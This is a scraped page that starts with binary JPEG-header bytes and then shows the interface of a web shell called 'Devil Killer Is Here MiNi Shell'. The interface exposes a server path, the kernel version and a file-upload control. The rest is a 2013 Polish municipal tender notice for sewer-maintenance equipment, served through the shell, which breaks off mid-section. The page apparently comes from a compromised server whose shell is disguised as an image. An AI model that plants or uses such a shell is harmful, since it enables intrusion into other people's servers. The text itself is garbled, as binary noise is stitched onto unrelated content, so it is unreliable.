JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20131004/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20131004/404590-N-2013.html

<p class="kh_header"><b>Jasienica 459: DOSTAWA URZĄDZEŃ ORAZ NARZĘDZI POTRZEBNYCH DO REALIZACJI ROBÓT ZWIĄZANYCH Z CODZIENNĄ OBSŁUGĄ SIECI KANALIZACJI SANITARNEJ PRZEZ ZAKŁAD KOMUNALNY W JASIENICY</b><br>
<b>Numer ogłoszenia: 404590 - 2013; data zamieszczenia: 04.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Komunalny w Jasienicy , Jasienica 459, 43-385 Jasienica 459, woj. śląskie, tel. 33 815 37 29.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.komunalny.jasienica.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA URZĄDZEŃ ORAZ NARZĘDZI POTRZEBNYCH DO REALIZACJI ROBÓT ZWIĄZANYCH Z CODZIENNĄ OBSŁUGĄ SIECI KANALIZACJI SANITARNEJ PRZEZ ZAKŁAD KOMUNALNY W JASIENICY.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.1.Przedmiotem niniejszego zamówienia jest dostawa fabrycznie nowych, nieużywanych urządzeń oraz narzędzi potrzebnych do realizacji robót związanych z codzienną obsługą sieci kanalizacji sanitarnej do siedziby Zamawiającego, według 4 pakietów.
3.2.Okres gwarancji przedmiotu zamówienia nie może być krótszy niż:
3.2.1.36 miesięcy od daty dostawy dla pakietów od 1 do 3,
3.2.2.24 miesiące od daty dostawy dla pakietu 4.
3.3.PAKIET 1 - Mierniki
PAKIET 2 - Zadymiarki, kamery, korki, narzędzia
PAKIET 3 - Agregaty prądotwórcze
PAKIET 4 - Przewody
3.4.PAKIET 1 - MIERNIKI
Okres gwarancji - min. 36 miesięcy
3.4.1.Przenośny miernik wielogazowy - 4 szt. Wymagania minimalne:
3.4.1.1.	Fabrycznie nowy
3.4.1.2.	Pomiar stężenia min. następujących gazów: O2, CO, H2S, CH4 i gazów wybuchowych
3.4.1.3.	Przejrzysty duży wyświetlacz
3.4.1.4.	Sygnalizator akustyczny, świetlny i wibracyjny 
3.4.1.5.	Wewnętrzna pamięć
3.4.1.6.	Wyposażony w dodatkową sondę teleskopową z materiału kwasoodpornego o długości min. 1,5m 
3.4.1.7.	Wodoodporny
3.4.1.8.	Instrukcja obsługi w języku polskim.
3.4.1.9.	Zasilanie akumulatorowe 
3.4.1.10.Ładowarka sieciowa 230V + ładowarka samochodowa 12V
3.4.1.11.Gwarancja - 36 miesięcy
3.5.PAKIET 2 - ZADYMIARKI, KAMERY, KORKI, NARZĘDZIA
Okres gwarancji - min.36 miesięcy dla każdego z urządzeń/ narzędzi
3.5.1.Zadymiarka kanałowa - 1 komplet. Wymagania minimalne:
3.5.1.1.	Fabrycznie nowa
3.5.1.2.	Emisja dymu - minimum 830 m3/min.
3.5.1.3.	50 litrów płynu do wytwarzania mgły.
3.5.1.4.	Wąż PVC długości min. 6 metrów umożliwiający wprowadzenie dymu do rury
3.5.1.5.	Zamykany na klucz kufer do transportu urządzenia
3.5.1.6.	Maksymalny pobór mocy - 2500W
3.5.1.7.	Instrukcja obsługi w języku polskim lub szkolenie w siedzibie Zamawiającego
3.5.2.	Kamera Inspekcyjna - 1 komplet. Do zastosowania w rurach o średnicy 
od 70 do 400 mm. Wymagania minimalne kompletu:
3.5.2.1.	Fabrycznie nowa
3.5.2.2.	Kamera:
3.5.2.2.1.Wodoszczelna do głębokości zanurzenia min. 1 m
3.5.2.2.2.Przesyłająca kolorowy obraz do monitora 
3.5.2.2.3.Autopoziomowanie
3.5.2.2.4.Oświetlenie LED
3.5.2.2.5.Przystosowana do pokonywania łuków
3.5.2.2.6.Wykonana ze stali kwasoodpornej
3.5.2.2.7.Odporna na zarysowania soczewka obiektywu kamery
3.5.2.2.8.Szeroki kąt widzenia od 75 stopni
3.5.2.2.9.Skrętne oko
3.5.2.2.10.Automatyczny powrót oka do pozycji początkowej
3.5.2.3.	Jednostka sterująca:
3.5.2.3.1.Przenośna
3.5.2.3.2.Monitor kolorowy wielkości od 5 - 8 cali z osłoną przeciwsłoneczną
3.5.2.3.3.Cyfrowa rejestracja obrazu z kamery (zapis obrazu) z możliwością wykonywania zdjęć
3.5.2.3.4.Dane na ekranie: licznik odległości, data oraz czas
3.5.2.3.5.Elektroniczny licznik odległości z pamięcią i możliwością oznaczania uszkodzonych odcinków
3.5.2.3.6.Nośnik danych - karta SD min. 8 GB, dopuszcza się możliwość zapisu na 4 osobnych kartach, po 2GB każda
3.5.2.3.7.Klawiatura z powierzchnią zabezpieczającą przed wodą
3.5.2.3.8.Format zapisu w standardzie DVD
3.5.2.3.9.Regulacja oświetlenia kamery
3.5.2.3.10.Edytor tekstu do wprowadzania opisów i komentarzy na obraz
3.5.2.4.	Oprogramowanie inspekcyjne: 
3.5.2.4.1.Polskojęzyczne
3.5.2.4.2.Przyjazny dla użytkownika interfejs
3.5.2.4.3.Możliwość zapisu danych oraz ich wydruku w postaci raportów
3.5.2.5.	Wytrzymały mechanicznie bęben z elastycznym kablem wizyjnym do posuwu kamery i przesyłania obrazu:
3.5.2.5.1.Długość min. 60 metrów bieżących
3.5.2.6.	Akcesoria umożliwiające pracę kamery dla większych średnic rur (np. wózek)
3.5.2.7.	Zasilanie sieciowe oraz akumulatorowe.
3.5.2.8.	Sonda położenia głowicy kamery
3.5.3.	Korek pneumatyczny kanalizacyjny blokujący do przekroi kołowych:
3.5.3.1.	Fabrycznie nowe
3.5.3.2.	Dla średnic od 150 do 300 mm - 3szt.
3.5.3.3.	Dla średnic od 200 do 400 mm - 3 szt.
3.5.3.4.	Manometr do węża ciśnieniowego - 2 szt.
3.5.3.5.	Wąż ciśnieniowy pneumatyczny do łączenia korków z kompresorem - długość min. 10 metrów w formie spirali - 6 szt.
3.5.4.	Metalowe haki do otwierania włazów studzienek kanalizacyjnych - 3 szt.
3.5.4.1.	Fabrycznie nowe
3.5.5.	Wybieraki do studni:
3.5.5.1.	Fabrycznie nowe
3.5.5.2.	Długości 1,5 m - 3,5 m, z czaszą walcowatą - 2 szt.
3.5.5.3.	Długości 1,5 m - 3,5 m,  w formie chwytaka np. trójpalczastego - 2 szt.
3.5.6.	Maszyna do mechanicznego czyszczenia rur - 1 komplet. Minimalne wymagania:
3.5.6.1.	Fabrycznie nowa
3.5.6.2.	Przeznaczona do zastosowania w rurach od 75 mm do 315 mm.
3.5.6.3.	Spirale do średnic rur wymienionych w pkt. 3.5.6.2. - 60 mb (łączone ze sobą z krótszych elementów)
3.5.6.4.	Kosz na spirale
3.5.6.5.	Wiertła
3.5.6.4.1.Proste 32mm- 2 szt.
3.5.6.4.2.Lejkowe 32mm- 2 szt.
3.5.6.4.3.Obłe 32mm - 2 szt.
3.5.6.4.4.Widełkowa głowica tnąca 32mm - 2 szt.
3.5.6.4.5.Końcówka widelcowa dla rur o średnicy 160 oraz 200 - 2 szt.
3.5.6.6.	Zasilanie za pomocą silnika elektrycznego lub spalinowego
3.5.6.7.	Obroty prawo/lewo.
3.6.PAKIET 3 - AGREGATY PRĄDOTWÓRCZE
Okres gwarancji - min. 36 miesięcy
3.6.1.Agregat prądotwórczy przewoźny - 1 szt.:
3.6.1.1.	Agregat prądotwórczy musi posiadać deklarację zgodności WE (oświadczenie producenta lub jego upoważnionego przedstawiciela stwierdzające na jego wyłączną odpowiedzialność, że wyrób jest zgodny z zasadniczymi wymaganiami) zgodnie z art. 5 ust. 10 ustawy z 30 sierpnia 2002r. o systemie oceny zgodności (t.j. Dz.U. z 2010, Nr 138, poz. 935) wraz z uszczegółowieniem tych wymogów i wyposażeniem podanym niżej. Deklarację zgodności WE Dostawca będzie zobowiązany dostarczyć przed podpisaniem umowy.
3.6.1.2.	Fabrycznie nowy
3.6.1.3.	Przeznaczenie: awaryjne zasilanie pompowni ścieków lub stacji tłoczenia ścieków 
3.6.1.3.1.Pompownia ścieków - maksymalna moc pomp to 2 × 5,5 kW
3.6.1.3.2.Stacja tłoczenia moc kompresorów to 2 × 21kW (uruchamiane za pomocą falowników)
3.6.1.4.	Zabudowany na przyczepie homologowanej dwuosiowej z hamulcem najazdowym spełniającej wymagania zapisów ustawy Prawo o ruchu drogowym, przeznaczonej dla samochodów osobowych, wyposażonej m.in. w: instalację oświetlenia, przewód zasilający, miejsce na tablicę rejestracyjną, koło zapasowe, kliny i podpory boczne czy kółko podporowe dyszla
3.6.1.5.	Silnik 
3.6.1.5.1.wysokoprężny gwarantujący uzyskanie wymaganej mocy,
3.6.1.5.2.chłodzony cieczą 
3.6.1.5.3.wyposażony w kolektor wydechowy z tłumikiem, kolektor dolotowy powietrza 
3.6.1.5.4.elektryczny rozruch z akumulatora
3.6.1.5.5.alternator ładowania baterii akumulatora
3.6.1.6.	Zbiornik paliwa o pojemności zapewniającej pracę bez konieczności tankowania przez co najmniej 8 h
3.6.1.7.	Panel sterowania agregatu winien posiadać co najmniej: 
3.6.1.7.1.przycisk uruchomienia silnika, 
3.6.1.7.2.przycisk awaryjnego wyłączenia silnika, 
3.6.1.7.3.główny wyłącznik prądu, 
3.6.1.7.4.urządzenia kontrolno-pomiarowe: obrotomierz, licznik motogodzin pracy, 
3.6.1.7.5.kontrolka ładowania akumulatora, 
3.6.1.7.6.kontrolka ciśnienia oleju w silniku, 
3.6.1.7.7.kontrolka temperatury płynu chłodzącego w silniku
3.6.1.7.8.Gniazda wtykowe min. 2 x 400V/63A i 3 x 230V/16A 
3.6.1.8.	Agregat wyposażony co najmniej w:
3.6.1.8.1.zabezpieczenie przeciwporażeniowe
3.6.1.8.2.wyłącznik przeciwporażeniowy
3.6.1.9.	Prąd nominalny agregatu: 63A - 70A
3.6.1.10.Moc min. 36kW
3.6.1.11.Napięcie znamionowe 230/400V, częstotliwość - 50 Hz
3.6.1.12.Agregat trójfazowy
3.6.1.13.Regulator napięcia AVR
3.6.1.14.układ tłumienia drgań mechanicznych na ramie
3.6.1.15.stalowa,  odporna  na  warunki  atmosferyczne  osłona  akustyczna  całego  zespołu zapewniająca utrzymanie poziomu hałasu do maksimum 79 dB(A) z odległości 1m od urządzenia
3.6.1.16.Dopuszczalna masa całkowita (agregat wraz z przyczepą) - 2000 kg
3.6.2.Agregat prądotwórczy przenośny - 1 szt.
3.6.2.1.	Agregat prądotwórczy musi posiadać deklarację zgodności WE (oświadczenie producenta lub jego upoważnionego przedstawiciela stwierdzające na jego wyłączną odpowiedzialność, że wyrób jest zgodny z zasadniczymi wymaganiami) zgodnie z art. 5 ust. 10 ustawy z 30 sierpnia 2002r. o systemie oceny zgodności (t.j. Dz.U. z 2010, Nr 138, poz. 935) wraz z uszczegółowieniem tych wymogów i wyposażeniem podanym niżej. Deklarację zgodności WE Dostawca będzie zobowiązany dostarczyć przed podpisaniem umowy.
3.6.2.2.	Fabrycznie nowy
3.6.2.3.	Przeznaczenie: zasilanie przenośnych narzędzi takich jak wiertarka, kamera inspekcyjna, przenośne oświetlenie halogenowe
3.6.2.4.	Agregat trójfazowy
3.6.2.5.	Napięcie znamionowe 400V oraz 230V
3.6.2.6.	Gniazda wtykowe min. 1 x 400V/16A i 2 x 230V/16A
3.6.2.7.	Moc 230V: 3,5 - 4,5 kW; moc 400V: 4,5 - 6 kW
3.6.2.8.	Rozruch: rewersyjny linką
3.6.2.9.	Wyłącznik termiczny
3.6.2.10.Wyłącznik przy braku oleju
3.7.PAKIET 4 - PRZEWODY
3.8.Okres gwarancji - min. 24 miesiące
2.8.Przewód umożliwiający podłączenie agregatu do przepompowni ścieków:
a)Fabrycznie nowe
b)Długość przewodu: 
pierwszego: 200 mb zwijany na szpulę - 1 szt.
drugiego: 15 mb - 1 szt.
c)Przewody ruchome o żyłach miedzianych typu H07RN-F (lub równoważny), o przekroju 5x10 mm2 zakończone z jednej strony wtyczką, a z drugiej gniazdem -  obydwa gniazda 63A..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 38.43.21.00-3, 42.99.70.00-1, 32.20.00.00-5, 42.65.10.00-4, 44.51.20.00-2, 31.12.00.00-3, 31.30.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 21.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie formułuje wymagań w zakresie warunku. Ocena spełniania niniejszego warunku odbędzie się na podstawie oświadczenia o spełnianiu warunków określonych w art.22 ust.1 u.p.z.p</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie formułuje wymagań w zakresie warunku. Ocena spełniania niniejszego warunku odbędzie się na podstawie oświadczenia o spełnianiu warunków określonych w art.22 ust.1 u.p.z.p</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie formułuje wymagań w zakresie warunku. Ocena spełniania niniejszego warunku odbędzie się na podstawie oświadczenia o spełnianiu warunków określonych w art.22 ust.1 u.p.z.p.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie formułuje wymagań w zakresie warunku. Ocena spełniania niniejszego warunku odbędzie się na podstawie oświadczenia o spełnianiu warunków określonych w art.22 ust.1 u.p.z.p</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dostawcy znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.Ocena spełniania niniejszego warunku odbędzie się na podstawie oświadczenia o spełnianiu warunków określonych w art.22 ust.1 u.p.z.p</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Formularz Oferty sporządzony na podstawie wzoru stanowiącego Załącznik nr 1 do SIWZ,
2.Oświadczenie o spełnieniu warunków określonych w art. 22 ust. 1 u.p.z.p., w formie oryginału, na formularzu stanowiącym Załącznik nr 2 do SIWZ.
3. Stosowne Pełnomocnictwo(a) - w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru.
4. W przypadku Dostawców wspólnie ubiegających się o udzielenie zamówienia, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy, 
5. Dostawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków (zgodnie z art. 26 ust. 2b ustawy Pzp).
Dostawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. Zobowiązanie takie należy złożyć w oryginale.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>22.2.Zgodnie z art. 144 ust. 1 ustawy Zamawiający przewiduje możliwość dokonania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty w następujących przypadkach:
ZMIANY TECHNOLOGICZNE, W SZCZEGÓLNOŚCI:
22.2.1.	zmiana nazwy produktu przy zachowaniu jego parametrów,
22.2.2.	niedostępność na rynku materiałów lub urządzeń wskazanych w ofercie, dokumentacji projektowej lub technicznej spowodowana zaprzestaniem produkcji lub wycofaniem 
z rynku tych materiałów lub urządzeń;
22.2.3.	pojawienie się nowszej technologii wykonania przedmiotu zamówienia pozwalającej na zaoszczędzenie czasu realizacji zamówienia lub jego kosztów, jak również kosztów eksploatacji wykonanego przedmiotu umowy;
22.2.4.	konieczność zrealizowania przedmiotu zamówienia przy zastosowaniu innych rozwiązań technicznych/technologicznych niż wskazane w ofercie w sytuacji, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem przedmiotu zamówienia;
22.2.5.	konieczność zrealizowania przedmiotu zamówienia przy zastosowaniu innych rozwiązań technicznych lub materiałowych ze względu na zmiany obowiązującego prawa;
22.2.6.	konieczność zaspokojenia roszczeń lub oczekiwań osób trzecich - w tym grup społecznych lub zawodowych nie artykułowanych lub nie możliwych do jednoznacznego określenia w chwili zawierania umowy;
22.2.7.	w przypadku dostarczania w wyniku zmiany urządzeń lub narzędzi, na które wymagane było posiadanie określonych prawem świadectw, certyfikatów lub innych podobnych zaświadczeń, takie świadectwa, certyfikaty lub zaświadczenia będą zawsze wymagane wobec urządzeń lub narzędzi, zastępujących te proponowane w ofercie.
POZOSTAŁE ZMIANY:
